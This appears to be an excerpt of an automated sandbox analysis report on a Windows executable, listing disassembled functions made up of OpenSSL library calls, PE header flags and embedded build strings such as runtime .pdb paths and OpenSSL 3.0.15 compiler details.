        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF254990 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF254990
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242185 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFF242185
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24204F CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF24204F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2417DF ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF2417DF
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241893 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,1_2_00007FFDFF241893
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2989F0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF2989F0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2424EB CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF2424EB
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241492 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF241492
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF282A50 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,1_2_00007FFDFF282A50
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,1_2_00007FFDFF241A05
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2B8870 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2B8870
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A4860 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFDFF2A4860
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2426B2 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF2426B2
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E8C0 CRYPTO_free,1_2_00007FFDFF28E8C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24139D memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,1_2_00007FFDFF24139D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2BA8F0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,1_2_00007FFDFF2BA8F0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2AC8E0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2AC8E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241EE2 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF241EE2
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF254930 CRYPTO_get_ex_new_index,1_2_00007FFDFF254930
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E920 CRYPTO_free,1_2_00007FFDFF28E920
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E781 CRYPTO_free,CRYPTO_free,1_2_00007FFDFF28E781
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241F28 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF241F28
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241401 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF241401
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241F3C CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFF241F3C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2425F4 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,1_2_00007FFDFF2425F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241CA3 CRYPTO_strdup,CRYPTO_free,1_2_00007FFDFF241CA3
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242423 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF242423
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24162C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,1_2_00007FFDFF24162C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF284660 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFF284660
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25A6D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFDFF25A6D0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2826B0 ERR_new,ERR_set_debug,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,1_2_00007FFDFF2826B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24120D EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,1_2_00007FFDFF24120D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24103C CRYPTO_malloc,COMP_expand_block,1_2_00007FFDFF24103C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E700 CRYPTO_free,1_2_00007FFDFF28E700
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2416A4 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2416A4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241488 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF241488
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2485A0 CRYPTO_zalloc,CRYPTO_free,1_2_00007FFDFF2485A0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2605E0 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFF2605E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241212 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFF241212
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2413D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,1_2_00007FFDFF2413D9
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A6650 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFF2A6650
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2424CD CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,1_2_00007FFDFF2424CD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF298620 CRYPTO_memcmp,1_2_00007FFDFF298620
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF274490 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF274490
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2418B6 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF2418B6
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF241AC3
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2426E4 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,1_2_00007FFDFF2426E4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF241ACD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2B6550 CRYPTO_memcmp,1_2_00007FFDFF2B6550
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF254530 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,1_2_00007FFDFF254530
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF298390 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF298390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF252360 CRYPTO_THREAD_run_once,1_2_00007FFDFF252360
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2AA3D0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2AA3D0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A43C0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,1_2_00007FFDFF2A43C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241D93 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_MAC_init,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFF241D93
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF262410 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data,1_2_00007FFDFF262410
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2423DD EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFF2423DD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24198D CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF24198D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25E427 CRYPTO_THREAD_write_lock,1_2_00007FFDFF25E427
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF244300 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF244300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF241B31
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A0330 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFF2A0330
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E190 CRYPTO_free,1_2_00007FFDFF28E190
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241F55 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF241F55
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2415E6 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,memcpy,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF2415E6
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E200 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF28E200
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241389 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF241389
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242527 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF242527
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25C080 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF25C080
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2980C0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2980C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24E0AD ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,1_2_00007FFDFF24E0AD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2620A0 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,1_2_00007FFDFF2620A0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A00A0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF2A00A0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF244100 CRYPTO_free,1_2_00007FFDFF244100
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241361 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFF241361
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2419DD BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF2419DD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF26E124 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,CRYPTO_set_ex_data,CRYPTO_set_ex_data,CRYPTO_get_ex_data,1_2_00007FFDFF26E124
        Source: DChOtFdp9T.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687914565.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688219519.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685472622.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
        Source: Binary string: ucrtbase.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686106421.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685252137.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687144003.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687689879.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
